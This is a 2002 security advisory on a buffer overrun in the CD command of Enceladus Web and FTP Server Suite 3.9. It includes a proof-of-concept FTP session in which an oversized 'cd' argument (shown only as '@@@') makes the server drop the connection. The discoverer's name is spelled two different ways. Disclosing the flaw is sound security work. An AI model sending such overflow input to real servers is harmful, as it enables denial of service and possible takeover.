Reported November 26, 2002, by Tamir Sahin.

VERSIONS AFFECTED

  • Enceladus Web and FTP Server Suite Version 3.9

DESCRIPTION

A buffer overrun vulnerability in Enceladus Web and FTP Server Suite Version 3.9 can permit an attacker to execute arbitrary code on the vulnerable system. If an attacker supplies a long sequence of characters as an argument to the CD command, thereby exceeding the length of the input buffer, the excess data will overwrite other variables on the stack and the stack frame. An execution of arbitrary code can result from this scenario. For more specific details about each of these vulnerabilities, see the discoverer’s Web site.

DEMONSTRATION

The discoverer posted the following scenario as proof of concept:

ts@metacortex:~$ ftp 192.168.10.2

Connected to 192.168.10.2.

220 Mollensoft FTP Server Ready.

Name (192.168.10.2:ts): anonymous

331 Password required for anonymous.

Password:

230 User anonymous logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

500 'EPSV': command not understood.

227 Entering Passive Mode (192,168,10,2,6,160)

150 Data connection open for PASV transfer.

- -rwxr-xr-x 1 User Group 6468 Feb 17 01:13 index.html

- -rwxr-xr-x 1 User Group 70 Oct 31 04:52 readme.txt

226 Listing complete.

ftp> cd

@@@

421 Service not available, remote server has closed connection.

VENDOR RESPONSE

Mollensoft Software has been notified but hasn't yet released a patch for this problem.

CREDIT

Discovered by Tamer Sahin.